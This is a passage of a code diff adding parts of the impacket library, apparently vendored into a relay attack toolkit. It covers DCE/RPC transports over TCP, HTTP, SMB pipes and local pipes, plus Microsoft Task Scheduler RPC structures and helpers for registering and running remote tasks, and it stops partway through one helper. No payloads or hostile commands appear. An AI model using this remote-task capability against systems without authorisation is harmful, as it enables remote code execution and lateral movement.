+        self.__socket = 0
+        self.set_connect_timeout(30)
+
+    def connect(self):
+        af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_STREAM)[0]
+        self.__socket = socket.socket(af, socktype, proto)
+        try:
+            self.__socket.settimeout(self.get_connect_timeout())
+            self.__socket.connect(sa)
+        except socket.error as msg:
+            self.__socket.close()
+            raise DCERPCException("Could not connect: %s" % msg)
+        return 1
+
+    def disconnect(self):
+        try:
+            self.__socket.close()
+        except socket.error:
+            self.__socket = None
+            return 0
+        return 1
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        if self._max_send_frag:
+            offset = 0
+            while 1:
+                toSend = data[offset:offset+self._max_send_frag]
+                if not toSend:
+                    break
+                self.__socket.send(toSend)
+                offset += len(toSend)
+        else:
+            self.__socket.send(data)
+
+    def recv(self, forceRecv = 0, count = 0):
+        if count:
+            buffer = b''
+            while len(buffer) < count:
+               buffer += self.__socket.recv(count-len(buffer))
+        else:
+            buffer = self.__socket.recv(8192)
+        return buffer
+
+    def get_socket(self):
+        return self.__socket
+
+class HTTPTransport(TCPTransport, RPCProxyClient):
+    """Implementation of ncacn_http protocol sequence"""
+
+    def __init__(self, remoteName=None, dstport=593):
+        self._useRpcProxy = False
+        self._rpcProxyUrl = None
+        self._transport   = TCPTransport
+        self._version     = RPC_OVER_HTTP_v2
+
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        RPCProxyClient.__init__(self, remoteName, dstport)
+        self.set_connect_timeout(30)
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        return self._transport.set_credentials(self, username, password,
+            domain, lmhash, nthash, aesKey, TGT, TGS)
+
+    def rpc_proxy_init(self):
+        self._useRpcProxy = True
+        self._transport   = RPCProxyClient
+
+    def set_rpc_proxy_url(self, url):
+        self.rpc_proxy_init()
+        self._rpcProxyUrl = urlparse(url)
+
+    def get_rpc_proxy_url(self):
+        return urlunparse(self._rpcProxyUrl)
+
+    def set_stringbinding(self, set_stringbinding):
+        DCERPCTransport.set_stringbinding(self, set_stringbinding)
+
+        if self._stringbinding.is_option_set("RpcProxy"):
+            self.rpc_proxy_init()
+
+            rpcproxy = self._stringbinding.get_option("RpcProxy").split(":")
+
+            if rpcproxy[1] == '443':
+                self.set_rpc_proxy_url('https://%s/rpc/rpcproxy.dll' % rpcproxy[0])
+            elif rpcproxy[1] == '80':
+                self.set_rpc_proxy_url('http://%s/rpc/rpcproxy.dll' % rpcproxy[0])
+            else:
+                # 2.1.2.1
+                # RPC over HTTP always uses port 80 for HTTP traffic and port 443 for HTTPS traffic.
+                # But you can use set_rpc_proxy_url method to set any URL / query you want.
+                raise DCERPCException("RPC Proxy port must be 80 or 443")
+
+    def connect(self):
+        if self._useRpcProxy == False:
+            # Connecting directly to the ncacn_http port
+            #
+            # Here we using RPC over HTTPv1 instead complex RPC over HTTP v2 syntax
+            # RPC over HTTP v2 here can be implemented in the future
+            self._version = RPC_OVER_HTTP_v1
+
+            TCPTransport.connect(self)
+
+            # Reading legacy server response
+            data = self.get_socket().recv(8192)
+
+            if data != b'ncacn_http/1.0':
+                raise DCERPCException("%s:%s service is not ncacn_http" % (self.__remoteName, self.__dstport))
+        else:
+            RPCProxyClient.connect(self)
+
+    def send(self, data, forceWriteAndx=0, forceRecv=0):
+        return self._transport.send(self, data, forceWriteAndx, forceRecv)
+
+    def recv(self, forceRecv=0, count=0):
+        return self._transport.recv(self, forceRecv, count)
+
+    def get_socket(self):
+        if self._useRpcProxy == False:
+            return TCPTransport.get_socket(self)
+        else:
+            raise DCERPCException("This method is not supported for RPC Proxy connections")
+
+    def disconnect(self):
+        return self._transport.disconnect(self)
+
+class SMBTransport(DCERPCTransport):
+    """Implementation of ncacn_np protocol sequence"""
+
+    def __init__(self, remoteName, dstport=445, filename='', username='', password='', domain='', lmhash='', nthash='',
+                 aesKey='', TGT=None, TGS=None, remote_host='', smb_connection=0, doKerberos=False, kdcHost=None):
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        self.__socket = None
+        self.__tid = 0
+        self.__filename = filename
+        self.__handle = 0
+        self.__pending_recv = 0
+        self.set_credentials(username, password, domain, lmhash, nthash, aesKey, TGT, TGS)
+        self._doKerberos = doKerberos
+        self._kdcHost = kdcHost
+
+        if remote_host != '':
+            self.setRemoteHost(remote_host)
+
+        if smb_connection == 0:
+            self.__existing_smb = False
+        else:
+            self.__existing_smb = True
+            self.set_credentials(*smb_connection.getCredentials())
+
+        self.__prefDialect = None
+        self.__smb_connection = smb_connection
+        self.set_connect_timeout(30)
+
+    def preferred_dialect(self, dialect):
+        self.__prefDialect = dialect
+
+    def setup_smb_connection(self):
+        if not self.__smb_connection:
+            self.__smb_connection = SMBConnection(self.getRemoteName(), self.getRemoteHost(), sess_port=self.get_dport(),
+                                                  preferredDialect=self.__prefDialect, timeout=self.get_connect_timeout())
+            if self._strict_hostname_validation:
+                self.__smb_connection.setHostnameValidation(self._strict_hostname_validation, self._validation_allow_absent, self._accepted_hostname)
+
+    def connect(self):
+        # Check if we have a smb connection already setup
+        if self.__smb_connection == 0:
+            self.setup_smb_connection()
+            if self._doKerberos is False:
+                self.__smb_connection.login(self._username, self._password, self._domain, self._lmhash, self._nthash)
+            else:
+                self.__smb_connection.kerberosLogin(self._username, self._password, self._domain, self._lmhash,
+                                                    self._nthash, self._aesKey, kdcHost=self._kdcHost, TGT=self._TGT,
+                                                    TGS=self._TGS)
+        self.__tid = self.__smb_connection.connectTree('IPC$')
+        self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
+        self.__socket = self.__smb_connection.getSMBServer().get_socket()
+        return 1
+
+    def disconnect(self):
+        self.__smb_connection.disconnectTree(self.__tid)
+        # If we created the SMB connection, we close it, otherwise
+        # that's up for the caller
+        if self.__existing_smb is False:
+            self.__smb_connection.logoff()
+            self.__smb_connection.close()
+            self.__smb_connection = 0
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        if self._max_send_frag:
+            offset = 0
+            while 1:
+                toSend = data[offset:offset+self._max_send_frag]
+                if not toSend:
+                    break
+                self.__smb_connection.writeFile(self.__tid, self.__handle, toSend, offset = offset)
+                offset += len(toSend)
+        else:
+            self.__smb_connection.writeFile(self.__tid, self.__handle, data)
+        if forceRecv:
+            self.__pending_recv += 1
+
+    def recv(self, forceRecv = 0, count = 0 ):
+        if self._max_send_frag or self.__pending_recv:
+            # _max_send_frag is checked because it's the same condition we checked
+            # to decide whether to use write_andx() or send_trans() in send() above.
+            if self.__pending_recv:
+                self.__pending_recv -= 1
+            return self.__smb_connection.readFile(self.__tid, self.__handle, bytesToRead = self._max_recv_frag)
+        else:
+            return self.__smb_connection.readFile(self.__tid, self.__handle)
+
+    def get_smb_connection(self):
+        return self.__smb_connection
+
+    def set_smb_connection(self, smb_connection):
+        self.__smb_connection = smb_connection
+        self.set_credentials(*smb_connection.getCredentials())
+        self.__existing_smb = True
+
+    def get_smb_server(self):
+        # Raw Access to the SMBServer (whatever type it is)
+        return self.__smb_connection.getSMBServer()
+
+    def get_socket(self):
+        return self.__socket
+
+    def doesSupportNTLMv2(self):
+        return self.__smb_connection.doesSupportNTLMv2()
+
+class LOCALTransport(DCERPCTransport):
+    """
+    Implementation of ncalocal protocol sequence, not the same
+    as ncalrpc (I'm not doing LPC just opening the local pipe)
+    """
+
+    def __init__(self, filename = ''):
+        DCERPCTransport.__init__(self, '', 0)
+        self.__filename = filename
+        self.__handle = 0
+
+    def connect(self):
+        if self.__filename.upper().find('PIPE') < 0:
+            self.__filename = '\\PIPE\\%s' % self.__filename
+        self.__handle = os.open('\\\\.\\%s' % self.__filename, os.O_RDWR|os.O_BINARY)
+        return 1
+
+    def disconnect(self):
+        os.close(self.__handle)
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        os.write(self.__handle, data)
+
+    def recv(self, forceRecv = 0, count = 0 ):
+        data = os.read(self.__handle, 65535)
+        return data

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/tsch.py

@@ -0,0 +1,799 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-TSCH] ITaskSchedulerService Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR, NULL, GUID, PSYSTEMTIME, SYSTEMTIME
+from impacket.structure import Structure
+from impacket import hresult_errors, system_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_TSCHS  = uuidtup_to_bin(('86D35949-83C9-4044-B424-DB363231FD0C','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        elif key & 0xffff in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key & 0xffff][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key & 0xffff][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.3.1 Constant Values
+CNLEN = 15
+DNLEN = CNLEN
+UNLEN = 256
+MAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1)
+
+# 2.3.7 Flags
+TASK_FLAG_INTERACTIVE                  = 0x1
+TASK_FLAG_DELETE_WHEN_DONE             = 0x2
+TASK_FLAG_DISABLED                     = 0x4
+TASK_FLAG_START_ONLY_IF_IDLE           = 0x10
+TASK_FLAG_KILL_ON_IDLE_END             = 0x20
+TASK_FLAG_DONT_START_IF_ON_BATTERIES   = 0x40
+TASK_FLAG_KILL_IF_GOING_ON_BATTERIES   = 0x80
+TASK_FLAG_RUN_ONLY_IF_DOCKED           = 0x100
+TASK_FLAG_HIDDEN                       = 0x200
+TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
+TASK_FLAG_RESTART_ON_IDLE_RESUME       = 0x800
+TASK_FLAG_SYSTEM_REQUIRED              = 0x1000
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON        = 0x2000
+
+# 2.3.9 TASK_LOGON_TYPE
+TASK_LOGON_NONE                          = 0
+TASK_LOGON_PASSWORD                      = 1
+TASK_LOGON_S4U                           = 2
+TASK_LOGON_INTERACTIVE_TOKEN             = 3
+TASK_LOGON_GROUP                         = 4
+TASK_LOGON_SERVICE_ACCOUNT               = 5
+TASK_LOGON_INTERACTIVE_TOKEN_OR_PASSWORD = 6
+
+# 2.3.13 TASK_STATE
+TASK_STATE_UNKNOWN  = 0
+TASK_STATE_DISABLED = 1
+TASK_STATE_QUEUED   = 2
+TASK_STATE_READY    = 3
+TASK_STATE_RUNNING  = 4
+
+# 2.4.1 FIXDLEN_DATA
+SCHED_S_TASK_READY         = 0x00041300
+SCHED_S_TASK_RUNNING       = 0x00041301
+SCHED_S_TASK_NOT_SCHEDULED = 0x00041301
+
+# 2.4.2.11 Triggers
+TASK_TRIGGER_FLAG_HAS_END_DATE         = 0
+TASK_TRIGGER_FLAG_KILL_AT_DURATION_END = 0
+TASK_TRIGGER_FLAG_DISABLED             = 0
+
+# ToDo: Change this to enums
+ONCE                 = 0
+DAILY                = 1
+WEEKLY               = 2
+MONTHLYDATE          = 3
+MONTHLYDOW           = 4
+EVENT_ON_IDLE        = 5
+EVENT_AT_SYSTEMSTART = 6
+EVENT_AT_LOGON       = 7
+
+SUNDAY    = 0
+MONDAY    = 1
+TUESDAY   = 2
+WEDNESDAY = 3
+THURSDAY  = 4
+FRIDAY    = 5
+SATURDAY  = 6
+
+JANUARY   = 1
+FEBRUARY  = 2
+MARCH     = 3
+APRIL     = 4
+MAY       = 5
+JUNE      = 6
+JULY      = 7
+AUGUST    = 8
+SEPTEMBER = 9
+OCTOBER   = 10
+NOVEMBER  = 11
+DECEMBER  = 12
+
+# 2.4.2.11.8 MONTHLYDOW Trigger
+FIRST_WEEK  = 1
+SECOND_WEEK = 2
+THIRD_WEEK  = 3
+FOURTH_WEEK = 4
+LAST_WEEK   = 5
+
+# 2.3.12 TASK_NAMES
+TASK_NAMES = LPWSTR
+
+# 3.2.5.4.2 SchRpcRegisterTask (Opnum 1)
+TASK_VALIDATE_ONLY                = 1<<(31-31)
+TASK_CREATE                       = 1<<(31-30)
+TASK_UPDATE                       = 1<<(31-29)
+TASK_DISABLE                      = 1<<(31-28)
+TASK_DON_ADD_PRINCIPAL_ACE        = 1<<(31-27)
+TASK_IGNORE_REGISTRATION_TRIGGERS = 1<<(31-26)
+
+# 3.2.5.4.5 SchRpcSetSecurity (Opnum 4)
+TASK_DONT_ADD_PRINCIPAL_ACE = 1<<(31-27)
+SCH_FLAG_FOLDER             = 1<<(31-2)
+SCH_FLAG_TASK               = 1<<(31-1) 
+
+# 3.2.5.4.7 SchRpcEnumFolders (Opnum 6)
+TASK_ENUM_HIDDEN = 1
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+TASK_RUN_AS_SELF            = 1<<(31-31)
+TASK_RUN_IGNORE_CONSTRAINTS = 1<<(31-30)
+TASK_RUN_USE_SESSION_ID     = 1<<(31-29)
+TASK_RUN_USER_SID           = 1<<(31-28)
+
+# 3.2.5.4.18 SchRpcGetTaskInfo (Opnum 17)
+SCH_FLAG_STATE            = 1<<(31-3)
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.3.12 TASK_NAMES
+class TASK_NAMES_ARRAY(NDRUniConformantArray):
+    item = TASK_NAMES
+
+class PTASK_NAMES_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',TASK_NAMES_ARRAY),
+    )
+
+class WSTR_ARRAY(NDRUniConformantArray):
+    item = WSTR
+
+class PWSTR_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',WSTR_ARRAY),
+    )
+
+class GUID_ARRAY(NDRUniConformantArray):
+    item = GUID
+
+class PGUID_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',GUID_ARRAY),
+    )
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+class SYSTEMTIME_ARRAY(NDRUniConformantArray):
+    item = SYSTEMTIME
+
+class PSYSTEMTIME_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',SYSTEMTIME_ARRAY),
+    )
+
+# 2.3.8 TASK_USER_CRED
+class TASK_USER_CRED(NDRSTRUCT):
+    structure =  (
+        ('userId',LPWSTR),
+        ('password',LPWSTR),
+        ('flags',DWORD),
+    )
+
+class TASK_USER_CRED_ARRAY(NDRUniConformantArray):
+    item = TASK_USER_CRED
+
+class LPTASK_USER_CRED_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',TASK_USER_CRED_ARRAY),
+    )
+
+# 2.3.10 TASK_XML_ERROR_INFO
+class TASK_XML_ERROR_INFO(NDRSTRUCT):
+    structure =  (
+        ('line',DWORD),
+        ('column',DWORD),
+        ('node',LPWSTR),
+        ('value',LPWSTR),
+    )
+
+class PTASK_XML_ERROR_INFO(NDRPOINTER):
+    referent = (
+        ('Data',TASK_XML_ERROR_INFO),
+    )
+
+# 2.4.1 FIXDLEN_DATA
+class FIXDLEN_DATA(Structure):
+    structure = (
+        ('Product Version','<H=0'),
+        ('File Version','<H=0'),
+        ('Job uuid','16s="'),
+        ('App Name Len Offset','<H=0'),
+        ('Trigger Offset','<H=0'),
+        ('Error Retry Count','<H=0'),
+        ('Error Retry Interval','<H=0'),
+        ('Idle Deadline','<H=0'),
+        ('Idle Wait','<H=0'),
+        ('Priority','<L=0'),
+        ('Maximum Run Time','<L=0'),
+        ('Exit Code','<L=0'),
+        ('Status','<L=0'),
+        ('Flags','<L=0'),
+    )
+
+# 2.4.2.11 Triggers
+class TRIGGERS(Structure):
+    structure = (
+        ('Trigger Size','<H=0'),
+        ('Reserved1','<H=0'),
+        ('Begin Year','<H=0'),
+        ('Begin Month','<H=0'),
+        ('Begin Day','<H=0'),
+        ('End Year','<H=0'),
+        ('End Month','<H=0'),
+        ('End Day','<H=0'),
+        ('Start Hour','<H=0'),
+        ('Start Minute','<H=0'),
+        ('Minutes Duration','<L=0'),
+        ('Minutes Interval','<L=0'),
+        ('Flags','<L=0'),
+        ('Trigger Type','<L=0'),
+        ('TriggerSpecific0','<H=0'),
+        ('TriggerSpecific1','<H=0'),
+        ('TriggerSpecific2','<H=0'),
+        ('Padding','<H=0'),
+        ('Reserved2','<H=0'),
+        ('Reserved3','<H=0'),
+    )
+
+# 2.4.2.11.6 WEEKLY Trigger
+class WEEKLY(Structure):
+    structure = (
+        ('Trigger Type','<L=0'),
+        ('Weeks Interval','<H=0'),
+        ('DaysOfTheWeek','<H=0'),
+        ('Unused','<H=0'),
+        ('Padding','<H=0'),
+    )
+
+# 2.4.2.11.7 MONTHLYDATE Trigger
+class MONTHLYDATE(Structure):
+    structure = (
+        ('Trigger Type','<L=0'),
+        ('Days','<L=0'),
+        ('Months','<H=0'),
+        ('Padding','<H=0'),
+    )
+
+# 2.4.2.11.8 MONTHLYDOW Trigger
+class MONTHLYDOW(Structure):
+    structure = (
+        ('Trigger Type','<L=0'),
+        ('WhichWeek','<H=0'),
+        ('DaysOfTheWeek','<H=0'),
+        ('Months','<H=0'),
+        ('Padding','<H=0'),
+        ('Reserved2','<H=0'),
+        ('Reserved3','<H=0'),
+    )
+
+# 2.4.2.12 Job Signature
+class JOB_SIGNATURE(Structure):
+    structure = (
+        ('SignatureVersion','<HH0'),
+        ('MinClientVersion','<H=0'),
+        ('Signature','64s="'),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.4.1 SchRpcHighestVersion (Opnum 0)
+class SchRpcHighestVersion(NDRCALL):
+    opnum = 0
+    structure = (
+    )
+
+class SchRpcHighestVersionResponse(NDRCALL):
+    structure = (
+        ('pVersion', DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.2 SchRpcRegisterTask (Opnum 1)
+class SchRpcRegisterTask(NDRCALL):
+    opnum = 1
+    structure = (
+        ('path', LPWSTR),
+        ('xml', WSTR),
+        ('flags', DWORD),
+        ('sddl', LPWSTR),
+        ('logonType', DWORD),
+        ('cCreds', DWORD),
+        ('pCreds', LPTASK_USER_CRED_ARRAY),
+    )
+
+class SchRpcRegisterTaskResponse(NDRCALL):
+    structure = (
+        ('pActualPath', LPWSTR),
+        ('pErrorInfo', PTASK_XML_ERROR_INFO),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.3 SchRpcRetrieveTask (Opnum 2)
+class SchRpcRetrieveTask(NDRCALL):
+    opnum = 2
+    structure = (
+        ('path', WSTR),
+        ('lpcwszLanguagesBuffer', WSTR),
+        ('pulNumLanguages', DWORD),
+    )
+
+class SchRpcRetrieveTaskResponse(NDRCALL):
+    structure = (
+        ('pXml', LPWSTR),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.4 SchRpcCreateFolder (Opnum 3)
+class SchRpcCreateFolder(NDRCALL):
+    opnum = 3
+    structure = (
+        ('path', WSTR),
+        ('sddl', LPWSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcCreateFolderResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.5 SchRpcSetSecurity (Opnum 4)
+class SchRpcSetSecurity(NDRCALL):
+    opnum = 4
+    structure = (
+        ('path', WSTR),
+        ('sddl', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcSetSecurityResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.6 SchRpcGetSecurity (Opnum 5)
+class SchRpcGetSecurity(NDRCALL):
+    opnum = 5
+    structure = (
+        ('path', WSTR),
+        ('securityInformation', DWORD),
+    )
+
+class SchRpcGetSecurityResponse(NDRCALL):
+    structure = (
+        ('sddl',LPWSTR),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.7 SchRpcEnumFolders (Opnum 6)
+class SchRpcEnumFolders(NDRCALL):
+    opnum = 6
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+        ('startIndex', DWORD),
+        ('cRequested', DWORD),
+    )
+
+class SchRpcEnumFoldersResponse(NDRCALL):
+    structure = (
+        ('startIndex', DWORD),
+        ('pcNames', DWORD),
+        ('pNames', PTASK_NAMES_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.8 SchRpcEnumTasks (Opnum 7)
+class SchRpcEnumTasks(NDRCALL):
+    opnum = 7
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+        ('startIndex', DWORD),
+        ('cRequested', DWORD),
+    )
+
+class SchRpcEnumTasksResponse(NDRCALL):
+    structure = (
+        ('startIndex', DWORD),
+        ('pcNames', DWORD),
+        ('pNames', PTASK_NAMES_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.9 SchRpcEnumInstances (Opnum 8)
+class SchRpcEnumInstances(NDRCALL):
+    opnum = 8
+    structure = (
+        ('path', LPWSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcEnumInstancesResponse(NDRCALL):
+    structure = (
+        ('pcGuids', DWORD),
+        ('pGuids', PGUID_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.10 SchRpcGetInstanceInfo (Opnum 9)
+class SchRpcGetInstanceInfo(NDRCALL):
+    opnum = 9
+    structure = (
+        ('guid', GUID),
+    )
+
+class SchRpcGetInstanceInfoResponse(NDRCALL):
+    structure = (
+        ('pPath', LPWSTR),
+        ('pState', DWORD),
+        ('pCurrentAction', LPWSTR),
+        ('pInfo', LPWSTR),
+        ('pcGroupInstances', DWORD),
+        ('pGroupInstances', PGUID_ARRAY),
+        ('pEnginePID', DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.11 SchRpcStopInstance (Opnum 10)
+class SchRpcStopInstance(NDRCALL):
+    opnum = 10
+    structure = (
+        ('guid', GUID),
+        ('flags', DWORD),
+    )
+
+class SchRpcStopInstanceResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.12 SchRpcStop (Opnum 11)
+class SchRpcStop(NDRCALL):
+    opnum = 11
+    structure = (
+        ('path', LPWSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcStopResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+class SchRpcRun(NDRCALL):
+    opnum = 12
+    structure = (
+        ('path', WSTR),
+        ('cArgs', DWORD),
+        ('pArgs', PWSTR_ARRAY),
+        ('flags', DWORD),
+        ('sessionId', DWORD),
+        ('user', LPWSTR),
+    )
+
+class SchRpcRunResponse(NDRCALL):
+    structure = (
+        ('pGuid', GUID),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.14 SchRpcDelete (Opnum 13)
+class SchRpcDelete(NDRCALL):
+    opnum = 13
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcDeleteResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.15 SchRpcRename (Opnum 14)
+class SchRpcRename(NDRCALL):
+    opnum = 14
+    structure = (
+        ('path', WSTR),
+        ('newName', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcRenameResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.16 SchRpcScheduledRuntimes (Opnum 15)
+class SchRpcScheduledRuntimes(NDRCALL):
+    opnum = 15
+    structure = (
+        ('path', WSTR),
+        ('start', PSYSTEMTIME),
+        ('end', PSYSTEMTIME),
+        ('flags', DWORD),
+        ('cRequested', DWORD),
+    )
+
+class SchRpcScheduledRuntimesResponse(NDRCALL):
+    structure = (
+        ('pcRuntimes',DWORD),
+        ('pRuntimes',PSYSTEMTIME_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.17 SchRpcGetLastRunInfo (Opnum 16)
+class SchRpcGetLastRunInfo(NDRCALL):
+    opnum = 16
+    structure = (
+        ('path', WSTR),
+    )
+
+class SchRpcGetLastRunInfoResponse(NDRCALL):
+    structure = (
+        ('pLastRuntime',SYSTEMTIME),
+        ('pLastReturnCode',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.18 SchRpcGetTaskInfo (Opnum 17)
+class SchRpcGetTaskInfo(NDRCALL):
+    opnum = 17
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcGetTaskInfoResponse(NDRCALL):
+    structure = (
+        ('pEnabled',DWORD),
+        ('pState',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.19 SchRpcGetNumberOfMissedRuns (Opnum 18)
+class SchRpcGetNumberOfMissedRuns(NDRCALL):
+    opnum = 18
+    structure = (
+        ('path', WSTR),
+    )
+
+class SchRpcGetNumberOfMissedRunsResponse(NDRCALL):
+    structure = (
+        ('pNumberOfMissedRuns',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.20 SchRpcEnableTask (Opnum 19)
+class SchRpcEnableTask(NDRCALL):
+    opnum = 19
+    structure = (
+        ('path', WSTR),
+        ('enabled', DWORD),
+    )
+
+class SchRpcEnableTaskResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (SchRpcHighestVersion,SchRpcHighestVersionResponse ),
+ 1 : (SchRpcRegisterTask,SchRpcRegisterTaskResponse ),
+ 2 : (SchRpcRetrieveTask,SchRpcRetrieveTaskResponse ),
+ 3 : (SchRpcCreateFolder,SchRpcCreateFolderResponse ),
+ 4 : (SchRpcSetSecurity,SchRpcSetSecurityResponse ),
+ 5 : (SchRpcGetSecurity,SchRpcGetSecurityResponse ),
+ 6 : (SchRpcEnumFolders,SchRpcEnumFoldersResponse ),
+ 7 : (SchRpcEnumTasks,SchRpcEnumTasksResponse ),
+ 8 : (SchRpcEnumInstances,SchRpcEnumInstancesResponse ),
+ 9 : (SchRpcGetInstanceInfo,SchRpcGetInstanceInfoResponse ),
+ 10 : (SchRpcStopInstance,SchRpcStopInstanceResponse ),
+ 11 : (SchRpcStop,SchRpcStopResponse ),
+ 12 : (SchRpcRun,SchRpcRunResponse ),
+ 13 : (SchRpcDelete,SchRpcDeleteResponse ),
+ 14 : (SchRpcRename,SchRpcRenameResponse ),
+ 15 : (SchRpcScheduledRuntimes,SchRpcScheduledRuntimesResponse ),
+ 16 : (SchRpcGetLastRunInfo,SchRpcGetLastRunInfoResponse ),
+ 17 : (SchRpcGetTaskInfo,SchRpcGetTaskInfoResponse ),
+ 18 : (SchRpcGetNumberOfMissedRuns,SchRpcGetNumberOfMissedRunsResponse),
+ 19 : (SchRpcEnableTask,SchRpcEnableTaskResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hSchRpcHighestVersion(dce):
+    return dce.request(SchRpcHighestVersion())
+
+def hSchRpcRegisterTask(dce, path, xml, flags, sddl, logonType, pCreds = ()):
+    request = SchRpcRegisterTask()
+    request['path'] = checkNullString(path)
+    request['xml'] = checkNullString(xml)
+    request['flags'] = flags
+    request['sddl'] = sddl
+    request['logonType'] = logonType
+    request['cCreds'] = len(pCreds)
+    if len(pCreds) == 0:
+        request['pCreds'] = NULL
+    else:
+        for cred in pCreds:
+            request['pCreds'].append(cred)
+    return dce.request(request)
+
+def hSchRpcRetrieveTask(dce, path, lpcwszLanguagesBuffer = '\x00', pulNumLanguages=0 ):
+    schRpcRetrieveTask = SchRpcRetrieveTask()
+    schRpcRetrieveTask['path'] = checkNullString(path)
+    schRpcRetrieveTask['lpcwszLanguagesBuffer'] = lpcwszLanguagesBuffer
+    schRpcRetrieveTask['pulNumLanguages'] = pulNumLanguages
+    return dce.request(schRpcRetrieveTask)
+
+def hSchRpcCreateFolder(dce, path, sddl = NULL):
+    schRpcCreateFolder = SchRpcCreateFolder()
+    schRpcCreateFolder['path'] = checkNullString(path)
+    schRpcCreateFolder['sddl'] = sddl
+    schRpcCreateFolder['flags'] = 0
+    return dce.request(schRpcCreateFolder)
+
+def hSchRpcSetSecurity(dce, path, sddl, flags):
+    schRpcSetSecurity = SchRpcSetSecurity()
+    schRpcSetSecurity['path'] = checkNullString(path)
+    schRpcSetSecurity['sddl'] = checkNullString(sddl)
